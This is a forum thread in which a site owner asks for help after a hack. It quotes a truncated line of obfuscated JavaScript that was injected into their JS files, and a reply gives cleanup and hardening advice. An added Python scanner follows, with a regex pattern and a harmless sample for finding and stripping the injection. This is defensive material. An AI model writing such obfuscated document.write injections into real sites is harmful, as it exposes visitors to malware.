  1. #1
    SitePoint Addict
    Join Date
    Apr 2010
    Posts
    390
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Does anyone know about this malware georgewkohn or bentley.poststreetdental

    Hi guys, my website has just been hacked. Google is showing the red warning (Warning: Something's Not Right Here!
    www.xxxxxxxx.com contains malware. Your computer might catch a virus if you visit this site.)

    stating that the site has been trying to access these two sites:
    http://xxxxxxx.com/direct.php?page=15f48be84d67654d
    http://xxxxxxx.com/direct.php?page=15f48be84d67654d

    I have now found that a lot of my JS files have this code at the bottom; when I remove it, it minimises the number of errors in the Chrome console (Inspect Element). Does anyone know whether someone actually logged in to my FTP, accessed the JS files and pasted that code into them, or whether it is some sort of program that wrote it?
    Code:
    var _0x965b=["\x3C\x64\x69\x76\x20\x6E\x61\x6D\x65\x3D\x22 ..... \x65"];document[_0x965b[1]](_0x965b[0]);
    At the moment I am going through every single file and deleting that line of code, but I am not sure if it might be something else or if someone has a way of accessing my FTP. I've changed the password.

    Any suggestions?

    Do I just delete the code in the JS files, or should I look for something else on the server?
    Last edited by Mittineague; Jul 4, 2012 at 15:07.

  2. #2
    dklynn, Certified Ethical Hacker
    Join Date
    Feb 2002
    Location
    Auckland
    Posts
    14,672
    Mentioned
    19 Post(s)
    Tagged
    3 Thread(s)
    macaela,

    You have been hacked!

    1. Tighten your security (FTP passwords, cPanel passwords), and carefully check any/all uploaded files!

    2. Check ALL files for this type of nefarious code and eliminate these lines (the entire javascript). Better yet, simply delete all your files and upload from your master copy.

    3. Have your host run maldet scans until it reports NO problems on successive scans.

    My host recommends this series of "precautionary steps" (after recovering from a hack attack):

    * Always use alphanumerical passwords and change the passwords frequently including cpanel password.
    * Keep scripts up to date- You should always keep your scripts updated to the latest stable version. Many new script releases contain security patches so it is very important to always upgrade.
    * Use trusted scripts- Use scripts from trusted developers that have a good track record of maintaining and updating their scripts.
    * Use secure permissions- Never use permissions 777 on folders or 666 on files.
    * Remove stuff you are not using- A very common source for account exploits is abandoned scripts which are not updated. Clients often install scripts for testing and forget about them, which are subsequently exploited and used to hijack the entire hosting account.
    * Disable Anonymous FTP accounts

    Regards,

    DK
    David K. Lynn - Data Koncepts is a long-time WebHostingBuzz (US/UK)
    Client and (unpaid) WHB Ambassador
    mod_rewrite Tutorial Article (setup, config, test & write
    mod_rewrite regex w/sample code) and Code Generator
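
One way to carry out step 2 of the reply above across a whole web root, as an added example that is not code from the thread. The regex is generalized from the single injected line quoted in post #1 (an assumption about its variants), and the sample payload and function names are constructed for illustration.

```python
import re
from pathlib import Path

# Shape of the injected statement quoted in post #1: an array named _0x<hex>
# holding \xNN-escaped strings, then document[arr[i]](arr[j]) via the same array.
INJECTED = re.compile(
    r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[[^\]]*\\x[0-9a-fA-F]{2}[^\]]*\]\s*;'
    r'\s*document\[\1\[\d+\]\]\(\1\[\d+\]\)\s*;?'
)

# Constructed, harmless sample: the escapes decode to "<div>" and "write".
SAMPLE = (r'var _0x965b=["\x3C\x64\x69\x76\x3E","\x77\x72\x69\x74\x65"];'
          r'document[_0x965b[1]](_0x965b[0]);')


def scan_text(text):
    """Return the 1-based numbers of lines that contain the injected statement."""
    return [n for n, line in enumerate(text.splitlines(), 1)
            if INJECTED.search(line)]


def strip_injection(text):
    """Remove only the matched statement. Minified files keep legitimate code
    on the same line, so deleting the whole line would break the site."""
    return INJECTED.sub("", text)


def scan_tree(root, suffixes=(".js",)):
    """Walk root and map each affected file (relative path) to its hit lines."""
    root = Path(root)
    hits = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            lines = scan_text(path.read_text(errors="replace"))
            if lines:
                hits[path.relative_to(root).as_posix()] = lines
    return hits


if __name__ == "__main__":
    import sys
    # Usage: python scan_injected.py /path/to/local/copy/of/site
    for name, lines in scan_tree(sys.argv[1]).items():
        print(f"{name}: injected statement on line(s) {lines}")
```

Run it against a downloaded copy of the site; an empty report only means this one pattern is absent, so the maldet scans in step 3 still apply.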

